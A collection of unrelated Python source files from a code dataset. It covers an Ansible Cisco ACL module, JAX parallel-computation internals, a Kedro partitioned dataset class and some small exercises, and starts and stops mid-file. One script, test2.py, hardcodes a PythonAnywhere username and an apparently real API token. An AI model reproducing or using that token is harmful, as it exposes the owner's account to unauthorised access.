commands)\n else:\n\n def common_want_config_code(want, cmd, commands):\n for each in want:\n if each[0] == \"afi\":\n continue\n temp = dict(each)\n temp_cmd = cmd + \" {0} {1}\".format(\n temp[\"name\"], temp[\"direction\"]\n )\n commands.append(temp_cmd)\n\n if want_afi == \"ipv4\":\n cmd = \"ip access-group\"\n common_want_config_code(w, cmd, commands)\n if want_afi == \"ipv6\":\n cmd = \"ipv6 traffic-filter\"\n common_want_config_code(w, cmd, commands)\n commands.sort()\n if commands:\n interface = want.get(\"name\")\n commands.insert(0, \"interface {0}\".format(interface))\n\n return commands\n\n def _clear_config(self, want, have, state=\"\"):\n \"\"\" Function that deletes the acl config based on the want and have config\n :param acl: acl config\n :param config: config\n :rtype: A list\n :returns: the commands generated based on input acl/config params\n \"\"\"\n commands = []\n\n if want.get(\"name\"):\n interface = \"interface \" + want[\"name\"]\n else:\n interface = \"interface \" + have[\"name\"]\n\n w_access_group = want.get(\"access_groups\")\n temp_want_acl_name = []\n if w_access_group:\n # get the user input afi and acls\n for each in w_access_group:\n want_acls = each.get(\"acls\")\n if want_acls:\n for each in want_acls:\n temp_want_acl_name.append(each.get(\"name\"))\n\n h_access_group = have.get(\"access_groups\")\n if h_access_group:\n for access_grp in h_access_group:\n for acl in access_grp.get(\"acls\"):\n acl_name = acl.get(\"name\")\n acl_direction = acl.get(\"direction\")\n if access_grp.get(\"afi\") == \"ipv4\":\n if acl_name in temp_want_acl_name:\n continue\n cmd = \"no ip access-group\"\n cmd += \" {0} {1}\".format(acl_name, acl_direction)\n commands.append(cmd)\n elif access_grp.get(\"afi\") == \"ipv6\":\n if acl_name in temp_want_acl_name:\n continue\n cmd = \"no ipv6 traffic-filter\"\n cmd += \" {0} {1}\".format(acl_name, acl_direction)\n commands.append(cmd)\n if commands:\n # inserting the interface at first\n commands.insert(0, interface)\n\n return commands\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/cisco/ios/plugins/module_utils/network/ios/config/acl_interfaces/acl_interfaces.py","file_name":"acl_interfaces.py","file_ext":"py","file_size_in_byte":15822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"319180631","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 25 17:00:05 2020\n\n@author: loris\n\nFaça um programa que peça para n pessoas a sua idade, ao final o programa devera verificar se a\nmédia de idade da turma varia entre 0 e 25,26 e 60 e maior que 60;\ne então, dizer se a turma é jovem, adulta ou idosa, conforme a média calculada.\n\n\n\"\"\"\nimport statistics as stc\n\nrepete = True\nlista = []\nprint(\"Digite n para encerrar\")\nwhile repete == True:\n entrada = input(\"Insira uma idade: \")\n if entrada == 'n' or entrada == 'N':\n repete = False\n continue\n numero = int(entrada)\n lista.append(numero)\n\nmedia = stc.mean(lista)\nprint(\"A média da turma é de \"+str(round(media,2))+\" anos\")\nif media >= 0 and media <= 25:\n print(\"A turma é jovem! \")\nif media >= 26 and media <= 60:\n print(\"A turma é adulta! \")\nif media > 60:\n print(\"A turma é idosa!\")","sub_path":"3 - Estrutura de Repetição/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"228048275","text":"import requests\r\nimport json\r\nmy_domain = 'Sampreet.pythonanywhere.com'\r\nusername = 'Sampreet'\r\ntoken = 'ca4f0a88a6e079a4a36d7dc50eef83b61379ce69'\r\nid1 = '12195600'\r\nid2 = '11969836'\r\ninput=\"print(3)\"\r\n#params = {'input': input,}\r\npayload = {'input':input,}\r\nresponse = requests.post('https://www.pythonanywhere.com/api/v0/user/{username}/consoles/{id2}/send_input/'.format(username=username, domain=my_domain,id2=id2),\r\n headers={'Authorization': 'Token {token}'.format(token=token),'Content-Type': 'application/json'},data=json.dumps(payload))\r\nif response.status_code == 200:\r\n print('All OK')\r\n print(response.text)\r\nelse:\r\n print('Got unexpected status code {}: {!r}'.format(response.status_code, response.content))\r\n \r\n","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"555392816","text":"from depparse.trans_based.parse import PartialParse\nimport torch\n\n\n_row_format = '{:10s}{:6s}{:20s}{:6s}{:20s}'\n_first_row = _row_format.format('WORD', 'HEAD', 'LABEL', 'PHEAD', 'PLABEL')\n\n\ndef print_fault(example, parser, fo, res_arcs=None):\n word = [parser.id2tok[i] for i in example['word'][1:]]\n head = [str(i) for i in example['head'][1:]]\n label = [parser.id2tok[i] if i in parser.id2tok else '' for i in example['label'][1:]]\n assert len(word) == len(head) and len(word) == len(label)\n\n if res_arcs is None:\n make_up = ['' for _ in range(len(word))]\n output = zip(word, head, label, make_up, make_up)\n else:\n assert len(word) == len(res_arcs)\n sorted_arcs = sorted(res_arcs, key=lambda t: t[1])\n p_head = [str(t[0]) for t in sorted_arcs]\n p_label = [parser.id2tok[t[2]] if t[2] in parser.id2tok else '' for t in sorted_arcs]\n output = zip(word, head, label, p_head, p_label)\n\n output = [_row_format.format(*list(row)) for row in output]\n fo.write('\\n'.join(output) + '\\n\\n')\n\n\ndef parse_and_output(model, data, parser, fo):\n n_ex = 0\n n_match = 0\n for example in data:\n ex = PartialParse(example)\n ex.safe_parse(model, parser)\n if not ex.success:\n print_fault(example, parser, fo)\n else:\n correct, n_words = ex.accuracy(parser.unlabeled)\n if correct < n_words:\n print_fault(example, parser, fo, res_arcs=ex.arcs)\n else:\n n_match += 1\n n_ex += 1\n\n print('Output / Total: {:d} / {:d}'.format(n_ex - n_match, n_ex))\n\n\ndef diagnosing(model, data, parser, output_file, **kwargs):\n model.eval()\n with torch.set_grad_enabled(False), open(output_file, 'w') as fo:\n fo.write(_first_row + '\\n')\n parse_and_output(model, data, parser, fo)\n","sub_path":"depparse/diagnosis/check_fault.py","file_name":"check_fault.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"293392495","text":"from pyspark import SparkConf, SparkContext\nimport sys\nimport random\nimport operator\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\n\n \ndef euler(partitions):\n total_iterations = 0\n\n for i in range(partitions):\n sum = 0.0\n while (sum <1.0):\n \n rnumber = random.random()\n sum += rnumber\n total_iterations += 1\n \n return total_iterations\n \n\ndef main(inputs):\n group = 10\n s = [inputs // group] * group\n RDDrange=sc.parallelize(s, numSlices=15)\n newRDD = RDDrange.map(euler) \n iterations = newRDD.reduce(operator.add)\n finaleuler = float (iterations) / inputs\n \n print (\"Euler is \", finaleuler)\n\n\nif __name__ == '__main__':\n conf = SparkConf().setAppName('euler')\n sc = SparkContext(conf=conf)\n assert sc.version >= '2.3' # make sure we have Spark 2.3+\n inputs = sys.argv[1]\n main(int(inputs))\n","sub_path":"A3/euler.py","file_name":"euler.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"16351665","text":"# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom collections import namedtuple, defaultdict\nfrom distutils.util import strtobool\nfrom contextlib import contextmanager\nimport itertools as it\nimport operator as op\nimport os\n\nimport numpy as onp\nimport six\nfrom six.moves import reduce\n\nfrom .. import core\nfrom .. import ad_util\nfrom .. import tree_util\nfrom .. import linear_util as lu\nfrom ..abstract_arrays import ShapedArray\nfrom ..util import partial, unzip2, concatenate, safe_map, prod\nfrom ..lib import xla_bridge as xb\nfrom .xla import (xla_shape, xla_destructure, translation_rule, abstractify,\n xla_shape_to_result_shape, jaxpr_computation)\nfrom .partial_eval import trace_to_subjaxpr, merge_pvals, JaxprTrace, PartialVal\nfrom .batching import dimsize, broadcast\nfrom . import parallel\nfrom . import xla\nfrom . import partial_eval as pe\n\nmap = safe_map\n\n\n### util\n\n\ndef chunk_transform(fun, chunksize, name, in_axes, out_axes_dst):\n \"\"\"Rewrite SPMD operations to act first on local chunks then cross-replica.\"\"\"\n temp_name = TempAxisName()\n fun = parallel.axisvar_split(fun, name, (temp_name, name))\n fun, out_axes_src = parallel.pmap_transform(fun, temp_name, in_axes)\n fun = move_output_axis_transform(fun, name, chunksize, out_axes_src, out_axes_dst)\n return fun\n\nclass TempAxisName(object):\n def __repr__(self):\n return ''.format(hex(id(self)))\n\n@lu.transformation\ndef move_output_axis_transform(name, chunksize, src, dst, *args):\n \"\"\"Function transformation that moves output axes from src to dst.\"\"\"\n ans = yield args\n yield moveaxis(name, chunksize, dst, src(), ans)\n\ndef moveaxis(name, sz, dst, src, x):\n aval = core.get_aval(x)\n if type(aval) is core.AbstractTuple:\n if type(src) is tuple and type(dst) is tuple:\n return core.pack(map(partial(moveaxis, name, sz), dst, src, x))\n elif type(src) is tuple:\n return core.pack(map(partial(moveaxis, name, sz, dst), src, x))\n elif type(dst) is tuple:\n srcs = (src,) * len(dst)\n return core.pack(map(partial(moveaxis, name, sz), dst, srcs, x))\n else:\n return core.pack(map(partial(moveaxis, name, sz, dst, src), x))\n elif isinstance(aval, ShapedArray):\n dst_ = (dst % aval.ndim) if dst is not None and aval.ndim else dst\n if src == dst_:\n return x\n else:\n if src is None:\n x = broadcast(x, sz, force_broadcast=True)\n src = 0\n dst_ = dst % (aval.ndim + 1)\n elif dst is None:\n return x.sum(src).psum('i')\n if src == dst_:\n return x\n else:\n perm = [i for i in range(onp.ndim(x)) if i != src]\n perm.insert(dst_, src)\n return x.transpose(perm)\n else:\n raise TypeError(type(aval))\n\ndef chunk_aval(chunksize, aval, axis):\n \"\"\"Transform an abstract value's shape to have chunksize extent along axis.\"\"\"\n if axis is None:\n return aval\n else:\n shape = list(aval.shape)\n shape[axis] = chunksize\n return ShapedArray(tuple(shape), aval.dtype)\n\n\ndef build_axis_spec_tree(spec, treedef):\n \"\"\"Given a JTupleTreeDef, canonicalize an axis spec for that treedef.\"\"\"\n if treedef is xla.leaf:\n return spec\n elif type(spec) is tuple:\n if treedef.child_specs:\n return tuple(map(build_axis_spec_tree, spec, treedef.child_specs))\n else:\n return ()\n else:\n return tuple(map(partial(build_axis_spec_tree, spec), treedef.child_specs))\n\ndef flatten(x):\n if type(x) is tuple:\n return tuple(_flatten(x))\n else:\n return x\n\ndef _flatten(x):\n if type(x) is tuple:\n return it.chain.from_iterable((_flatten(elt) for elt in x))\n else:\n return [x]\n\n\ndef shard_arg(mesh_spec, mesh_axis, axis, arg):\n \"\"\"Shard and device_put an input array argument along a logical axis.\"\"\"\n num_replicas = xb.get_replica_count()\n if prod(mesh_spec) != num_replicas:\n msg = \"mesh spec {} total size of {} doesn't match number of replicas {}.\"\n raise ValueError(msg.format(mesh_spec, prod(mesh_spec), num_replicas))\n shards = split_array(arg, mesh_spec[mesh_axis], axis)\n replica_shards = [shards[i] for i in shard_assignments(mesh_spec, mesh_axis)]\n return map(xb.device_put, replica_shards, range(num_replicas))\n\ndef unshard_output(mesh_spec, mesh_axis, out_axis, out_shards):\n \"\"\"Collect and concatenate sharded device results.\"\"\"\n _, ids = onp.unique(shard_assignments(mesh_spec, mesh_axis), return_index=True)\n if out_axis is None:\n return out_shards[0]\n elif type(out_axis) is int:\n shards = [out_shards[i] for i in ids]\n return onp.concatenate(shards, out_axis)\n else:\n raise TypeError(type(out_axis))\n\ndef shard_assignments(mesh_spec, mesh_axis):\n \"\"\"Given a mesh axis long which to shard data, compute replica assignments.\"\"\"\n indices_shape = [1] * len(mesh_spec)\n indices_shape[mesh_axis] = mesh_spec[mesh_axis]\n indices = onp.arange(mesh_spec[mesh_axis]).reshape(indices_shape)\n return tuple(onp.broadcast_to(indices, mesh_spec).ravel())\n\ndef replica_groups(mesh_spec, mesh_axis):\n \"\"\"Given a mesh axis along which to operate, compute XLA replica_groups.\"\"\"\n groups = onp.split(onp.arange(prod(mesh_spec)).reshape(mesh_spec),\n mesh_spec[mesh_axis], axis=mesh_axis)\n groups = map(onp.ravel, groups)\n return tuple(tuple(group) for group in zip(*groups))\n\ndef split_array(x, num_splits, axis):\n \"\"\"A special-case of numpy.split implemented in terms of indexing.\"\"\"\n if axis is None:\n return [x] * num_splits\n else:\n assert x.shape[axis] % num_splits == 0\n split_size = x.shape[axis] // num_splits\n def get_nth_subarray(n):\n idx = [slice(None)] * x.ndim\n idx[axis] = slice(n * split_size, (n+1) * split_size)\n return x[tuple(idx)]\n return map(get_nth_subarray, range(num_splits))\n\n\ndef chunk_size(axis_name, mesh_axis, in_axes, args):\n \"\"\"Compute the chunk size for mapped axes, checking for errors.\"\"\"\n global mesh_spec\n axis_sizes = reduce(set.union, map(dimsize, in_axes, args))\n if len(axis_sizes) == 0:\n msg = \"axis name '{}' not bound to any input axes.\"\n raise ValueError(msg.format(axis_name))\n elif len(axis_sizes) > 1:\n msg = \"axis name '{}' bound to multiple axes with different sizes: {}.\"\n raise ValueError(msg.format(axis_name, axis_sizes))\n else:\n axis_size = axis_sizes.pop()\n if axis_size % mesh_spec()[mesh_axis]:\n msg = (\"axis name '{}' bound to input axis of size {} mapped to mesh \"\n \"axis index {} with size {}, which does not evenly divide {}.\")\n raise ValueError(msg.format(axis_name, axis_size, mesh_axis,\n mesh_spec()[mesh_axis], axis_size))\n\n return axis_size // mesh_spec()[mesh_axis]\n\n\ndef mesh_spec():\n global _mesh_spec\n return _mesh_spec or (xb.get_replica_count(),)\n_mesh_spec = None\n\n@contextmanager\ndef device_mesh(spec):\n global _mesh_spec\n _mesh_spec, prev_spec = spec, _mesh_spec\n yield\n _mesh_spec = prev_spec\n\n# axis environments are tiny, so we don't worry about the cost of copying keys\ndef new_axis_env(d): return d\ndef extend_axis_env(d1, d2): return dict(d1, **d2)\n\n\n### xla_pcall\n\n\ndef compile_replicated(jaxpr, axis_env, consts, *abstract_args):\n arg_shapes = list(map(xla_shape, abstract_args))\n built_c = replicated_computation(jaxpr, axis_env, consts, (), *arg_shapes)\n result_shape = xla_shape_to_result_shape(built_c.GetReturnValueShape())\n return built_c.Compile(arg_shapes, xb.get_compile_options()), result_shape\n\ndef replicated_computation(jaxpr, axis_env, const_vals, freevar_shapes,\n *arg_shapes):\n c = xb.make_computation_builder(\"replicated_computation\")\n\n def read(v):\n return env[v]\n\n def write(v, node):\n assert node is not None\n env[v] = node\n\n env = {}\n consts_env = dict(zip(jaxpr.constvars, const_vals))\n write(core.unitvar, c.Tuple())\n map(write, jaxpr.constvars, map(c.Constant, const_vals))\n map(write, jaxpr.freevars, map(c.ParameterWithShape, freevar_shapes))\n map(write, jaxpr.invars, map(c.ParameterWithShape, arg_shapes))\n for eqn in jaxpr.eqns:\n in_nodes = map(read, eqn.invars)\n if eqn.primitive in parallel_translation_rules:\n rule = parallel_translation_rules[eqn.primitive]\n device_groups = axis_env[eqn.params['axis_name']]\n params = {k: eqn.params[k] for k in eqn.params if k != 'axis_name'}\n ans = rule(c, *in_nodes, device_groups=device_groups, **params)\n else:\n if eqn.bound_subjaxprs:\n in_shapes = map(c.GetShape, in_nodes)\n if eqn.primitive is xla_pcall_p:\n device_groups = replica_groups(mesh_spec(), eqn.params['mesh_axis'])\n new_axis_binding = {eqn.params['axis_name'] : device_groups}\n (subjaxpr, const_bindings, freevar_bindings), = eqn.bound_subjaxprs\n subc = replicated_computation(\n subjaxpr, extend_axis_env(new_axis_binding, axis_env),\n [consts_env[b] for b in const_bindings],\n map(c.GetShape, map(read, freevar_bindings)),\n *in_shapes)\n subfun = (subc, tuple(map(read, freevar_bindings)))\n ans = translation_rule(eqn.primitive)(c, subfun, *in_nodes)\n else:\n subcs = [jaxpr_computation(subjaxpr,\n [consts_env[b] for b in const_bindings],\n map(c.GetShape, map(read, freevar_bindings)),\n *in_shapes)\n for subjaxpr, const_bindings, freevar_bindings\n in eqn.bound_subjaxprs]\n subfuns = [(subc, tuple(map(read, freevar_bindings)))\n for subc, (_, _, freevar_bindings)\n in zip(subcs, eqn.bound_subjaxprs)]\n ans = translation_rule(eqn.primitive)(c, *(subfuns + in_nodes), **eqn.params)\n else:\n ans = translation_rule(eqn.primitive)(c, *in_nodes, **eqn.params)\n\n out_nodes = xla_destructure(c, ans) if eqn.destructure else [ans]\n map(write, eqn.outvars, out_nodes)\n return c.Build(read(jaxpr.outvar))\n\n\ndef xla_pcall_impl(fun, *args, **params):\n axis_name = params.pop('axis_name') # e.g. 'i'\n in_axes = params.pop('in_axes') # e.g. (0, None) or (0, 1)\n out_axes = params.pop('out_axes') # e.g. 0 or (None, 1)\n mesh_axis = params.pop('mesh_axis') # e.g. 0 or 1\n assert not params\n\n flat_args, in_trees = unzip2(map(xla.tree_flatten, args))\n flat_args = concatenate(flat_args)\n fun, out_tree = xla.flatten_fun(fun, in_trees)\n\n flat_in_axes = flatten(tuple(map(build_axis_spec_tree, in_axes, in_trees)))\n compiled_fun = xla_parallel_callable(fun, axis_name, flat_in_axes, mesh_axis,\n mesh_spec(), *map(abstractify, flat_args))\n flat_out_axes = flatten(build_axis_spec_tree(out_axes, out_tree()))\n flat_ans = compiled_fun(out_tree(), flat_out_axes, *flat_args)\n\n if out_tree() is xla.leaf:\n return flat_ans\n else:\n return xla.build_tree(iter(flat_ans), out_tree())\n\n@lu.memoize\ndef xla_parallel_callable(fun, axis_name, in_axes, mesh_axis, mesh_spec,\n *abstract_args):\n chunksize = next((x.shape[ax] // mesh_spec[mesh_axis]\n for x, ax in zip(abstract_args, in_axes)\n if ax is not None and type(x) is ShapedArray), None)\n if chunksize is not None:\n abstract_args = map(partial(chunk_aval, chunksize), abstract_args, in_axes)\n axis_env = new_axis_env({axis_name: replica_groups(mesh_spec, mesh_axis)})\n pvals = [PartialVal((aval, core.unit)) for aval in abstract_args]\n with core.new_master(JaxprTrace, True) as master:\n jaxpr, (pval, consts, env) = trace_to_subjaxpr(fun, master).call_wrapped(pvals)\n assert not env\n compiled, _ = compile_replicated(jaxpr, axis_env, consts, *abstract_args)\n del master, consts, jaxpr, env\n return partial(execute_replicated, in_axes, mesh_axis, mesh_spec, compiled, pval)\n\ndef execute_replicated(in_axes, mesh_axis, mesh_spec, compiled, pval,\n out_tree, out_axes, *args):\n input_bufs = map(partial(shard_arg, mesh_spec, mesh_axis), in_axes, args)\n input_bufs = zip(*input_bufs) if input_bufs else [[]] * xb.get_replica_count()\n out_bufs = compiled.ExecutePerReplica(input_bufs)\n out_shards = [merge_pvals(buf.to_py(), pval) for buf in out_bufs]\n if out_tree is xla.leaf:\n return unshard_output(mesh_spec, mesh_axis, out_axes, out_shards)\n else:\n return map(partial(unshard_output, mesh_spec, mesh_axis), out_axes,\n zip(*out_shards))\n\n\nxla_pcall_p = core.Primitive('xla_pcall')\nxla_pcall = partial(core.call_bind, xla_pcall_p)\nxla_pcall_p.def_custom_bind(xla_pcall)\nxla_pcall_p.def_impl(xla_pcall_impl)\nxla.translations[xla_pcall_p] = xla.xla_call_translation_rule\n\n\nparallel_translation_rules = {}\n","sub_path":"jax/interpreters/pxla.py","file_name":"pxla.py","file_ext":"py","file_size_in_byte":13323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"108285925","text":"from typing import List\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n res = []\n stk = []\n while root is not None or stk:\n while root is not None:\n stk.append(root)\n root = root.left\n\n root = stk.pop()\n res.append(root.val)\n root = root.right\n return res\n\n def inorderTraversal2(self, root: TreeNode) -> List[int]:\n res = []\n stk = [[0, root]]\n while stk:\n flag, cur = stk.pop()\n if cur is None:\n continue\n if flag == 0:\n stk.append([0, cur.right])\n stk.append([1, cur])\n stk.append([0, cur.left])\n else:\n res.append(cur.val)\n\n return res\n\n\ni = 0\ntree = [1, 2, '#', '#', 3, 4, '#', '#', 5, '#', '#']\ndef buildTree():\n global i\n global tree\n val = tree[i]\n i += 1\n if val == '#':\n return\n root = TreeNode(val)\n root.left = buildTree()\n root.right = buildTree()\n return root\n\n\nroot = buildTree()\nsolution = Solution()\nprint(solution.inorderTraversal2(root))\n","sub_path":"栈/一般栈应用/94. 二叉树的中序遍历.py","file_name":"94. 二叉树的中序遍历.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"224426834","text":"# Copyright 2018-2019 QuantumBlack Visual Analytics Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND\n# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS\n# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN\n# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n#\n# The QuantumBlack Visual Analytics Limited (\"QuantumBlack\") name and logo\n# (either separately or in combination, \"QuantumBlack Trademarks\") are\n# trademarks of QuantumBlack. The License does not grant you any right or\n# license to the QuantumBlack Trademarks. You may not use the QuantumBlack\n# Trademarks or any confusingly similar mark as a trademark for your product,\n# or use the QuantumBlack Trademarks in any other manner that might cause\n# confusion in the marketplace, including but not limited to in advertising,\n# on websites, or on software.\n#\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"``PartitionedDataSet`` loads and saves partitioned file-like data using the\nunderlying dataset definition. It also uses `fsspec` for filesystem level operations.\n\"\"\"\n\nfrom copy import deepcopy\nfrom functools import lru_cache\nfrom typing import Any, Callable, Dict, List, Tuple, Type, Union\nfrom warnings import warn\n\nimport fsspec\nfrom fsspec.utils import infer_storage_options\n\nfrom kedro.io.core import (\n VERSION_KEY,\n VERSIONED_FLAG_KEY,\n AbstractDataSet,\n DataSetError,\n parse_dataset_definition,\n)\nfrom kedro.io.data_catalog import CREDENTIALS_KEY\n\nDATASET_CREDENTIALS_KEY = \"dataset_credentials\"\n\nS3_PROTOCOLS = (\"s3\", \"s3a\", \"s3n\")\n\n\nclass PartitionedDataSet(AbstractDataSet):\n # pylint: disable=too-many-instance-attributes\n \"\"\"``PartitionedDataSet`` loads and saves partitioned file-like data using the\n underlying dataset definition. For filesystem level operations it uses `fsspec`:\n https://github.com/intake/filesystem_spec.\n\n Example:\n ::\n\n >>> import pandas as pd\n >>> from kedro.io import PartitionedDataSet\n >>>\n >>> credentials = {\n >>> \"key1\": \"secret1\", # will be passed to 'fsspec.filesystem()' call\n >>> \"dataset_credentials\": { # will be passed to the dataset initializer\n >>> \"key2\": \"secret2\",\n >>> \"key3\": \"secret3\"\n >>> }\n >>> }\n >>>\n >>> data_set = PartitionedDataSet(\n >>> path=\"s3://bucket-name/path/to/folder\",\n >>> dataset=\"CSVS3DataSet\",\n >>> credentials=credentials\n >>> )\n >>> loaded = data_set.load()\n >>> # assert isinstance(loaded, dict)\n >>>\n >>> combine_all = pd.DataFrame()\n >>>\n >>> for partition_id, partition_load_func in loaded.items():\n >>> partition_data = partition_load_func()\n >>> combine_all = pd.concat(\n >>> [combine_all, partition_data], ignore_index=True, sort=True\n >>> )\n >>>\n >>> new_data = pd.DataFrame({\"new\": [1, 2]})\n >>> # creates \"s3://bucket-name/path/to/folder/new/partition.csv\"\n >>> data_set.save({\"new/partition.csv\": new_data})\n >>>\n \"\"\"\n\n def __init__( # pylint: disable=too-many-arguments\n self,\n path: str,\n dataset: Union[str, Type[AbstractDataSet], Dict[str, Any]],\n filepath_arg: str = \"filepath\",\n filename_suffix: str = \"\",\n credentials: Dict[str, Any] = None,\n load_args: Dict[str, Any] = None,\n ):\n \"\"\"Creates a new instance of ``PartitionedDataSet``.\n\n Args:\n path: Path to the folder containing partitioned data.\n If path starts with the protocol (e.g., ``s3://``) then the\n corresponding ``fsspec`` concrete filesystem implementation will\n be used. If protocol is not specified,\n ``fsspec.implementations.local.LocalFileSystem`` will be used.\n **Note:** Some concrete implementations are bundled with ``fsspec``,\n while others (like ``s3`` or ``gcs``) must be installed separately\n prior to usage of the ``PartitionedDataSet``.\n dataset: Underlying dataset definition. This is used to instantiate\n the dataset for each file located inside the ``path``.\n Accepted formats are:\n a) object of a class that inherits from ``AbstractDataSet``\n b) a string representing a fully qualified class name to such class\n c) a dictionary with ``type`` key pointing to a string from b),\n other keys are passed to the Dataset initializer.\n **Note:** Credentials resolution is *not* currently supported\n for the underlying dataset definition.\n filepath_arg: Underlying dataset initializer argument that will\n contain a path to each corresponding partition file.\n If unspecified, defaults to \"filepath\".\n filename_suffix: If specified, only partitions that end with this\n string will be processed.\n credentials: Protocol-specific options that will be passed to\n ``fsspec.filesystem`` call:\n https://filesystem-spec.readthedocs.io/en/latest/api.html#fsspec.filesystem\n _and_ also to the underlying dataset initializer. If\n ``dataset_credentials`` key is present in this dictionary, then\n only its value will be passed to the dataset initializer ``credentials``\n argument instead of the copy of the entire dictionary.\n\n Example 1: If ``credentials = {\"k1\": \"secret1\"}``, then filesystem\n is called as ``filesystem(..., k1=\"secret1\")``, the dataset is\n instantiated as\n ``dataset_class(..., credentials={\"k1\": \"secret1\"})``.\n Example 2: If\n ``credentials = {\"k1\": \"secret1\", \"dataset_credentials\": {\"k2\": \"secret2\"}}``,\n then filesystem is called as ``filesystem(..., k1=\"secret1\")``,\n the dataset is instantiated as\n ``dataset_class(..., credentials={\"k2\": \"secret2\"})``.\n Example 3: If\n ``credentials = {\"dataset_credentials\": {\"k2\": \"secret2\"}}``,\n then credentials are not passed to the filesystem call, the dataset\n is instantiated as\n ``dataset_class(..., credentials={\"k2\": \"secret2\"})``.\n Example 4: If\n ``credentials = {\"k1\": \"secret1\", \"dataset_credentials\": None}``,\n then filesystem is called as ``filesystem(..., k1=\"secret1\")``,\n credentials are not passed to the dataset initializer.\n\n load_args: Keyword arguments to be passed into ``find()`` method of\n the filesystem implementation.\n\n Raises:\n DataSetError: If versioning is enabled for the underlying dataset.\n \"\"\"\n super().__init__()\n\n self._path = path\n self._filename_suffix = filename_suffix\n self._protocol = infer_storage_options(self._path)[\"protocol\"]\n\n dataset = dataset if isinstance(dataset, dict) else {\"type\": dataset}\n self._dataset_type, self._dataset_config = parse_dataset_definition(dataset)\n if VERSION_KEY in self._dataset_config:\n raise DataSetError(\n \"`{}` does not support versioning of the underlying dataset. \"\n \"Please remove `{}` flag from the dataset definition.\".format(\n self.__class__.__name__, VERSIONED_FLAG_KEY\n )\n )\n\n if CREDENTIALS_KEY in self._dataset_config:\n raise DataSetError(\n \"Credentials for the underlying dataset must not be specified \"\n \"explicitly in dataset configuration. Please put those under \"\n \"`dataset_credentials` key in a dictionary and pass as \"\n \"`credentials` argument to {} initializer.\".format(\n self.__class__.__name__\n )\n )\n self._credentials, dataset_credentials = _split_credentials(credentials)\n if dataset_credentials:\n self._dataset_config[CREDENTIALS_KEY] = dataset_credentials\n\n self._filepath_arg = filepath_arg\n if self._filepath_arg in self._dataset_config:\n warn(\n \"`{}` key must not be specified in the dataset definition as it \"\n \"will be overwritten by partition path\".format(self._filepath_arg)\n )\n\n self._load_args = deepcopy(load_args) or {}\n self._sep = self._filesystem.sep\n # since some filesystem implementations may implement a global cache\n self.invalidate_cache()\n\n @property\n def _filesystem(self) -> fsspec.AbstractFileSystem:\n protocol = \"s3\" if self._protocol in S3_PROTOCOLS else self._protocol\n return fsspec.filesystem(protocol, **self._credentials)\n\n @lru_cache(maxsize=None)\n def _list_partitions(self) -> List[str]:\n return [\n path\n for path in self._filesystem.find(self._path, **self._load_args)\n if path.endswith(self._filename_suffix)\n ]\n\n def _join_protocol(self, path: str) -> str:\n if self._path.startswith(self._protocol) and not path.startswith(\n self._protocol\n ):\n return \"{}://{}\".format(self._protocol, path)\n return path\n\n def _partition_to_path(self, path: str):\n dir_path = self._path.rstrip(self._sep)\n path = path.lstrip(self._sep)\n full_path = self._sep.join([dir_path, path]) + self._filename_suffix\n return full_path\n\n def _path_to_partition(self, path: str) -> str:\n dir_path = self._filesystem._strip_protocol( # pylint: disable=protected-access\n self._path\n )\n path = path.split(dir_path, 1).pop().lstrip(self._sep)\n if self._filename_suffix and path.endswith(self._filename_suffix):\n path = path[: -len(self._filename_suffix)]\n return path\n\n def _load(self) -> Dict[str, Callable[[], Any]]:\n partitions = {}\n\n for partition in self._list_partitions():\n kwargs = deepcopy(self._dataset_config)\n # join the protocol back since PySpark may rely on it\n kwargs[self._filepath_arg] = self._join_protocol(partition)\n dataset = self._dataset_type(**kwargs) # type: ignore\n partition_id = self._path_to_partition(partition)\n partitions[partition_id] = dataset.load\n\n if not partitions:\n raise DataSetError(\"No partitions found in `{}`\".format(self._path))\n\n return partitions\n\n def _save(self, data: Dict[str, Any]) -> None:\n for partition_id, partition_data in 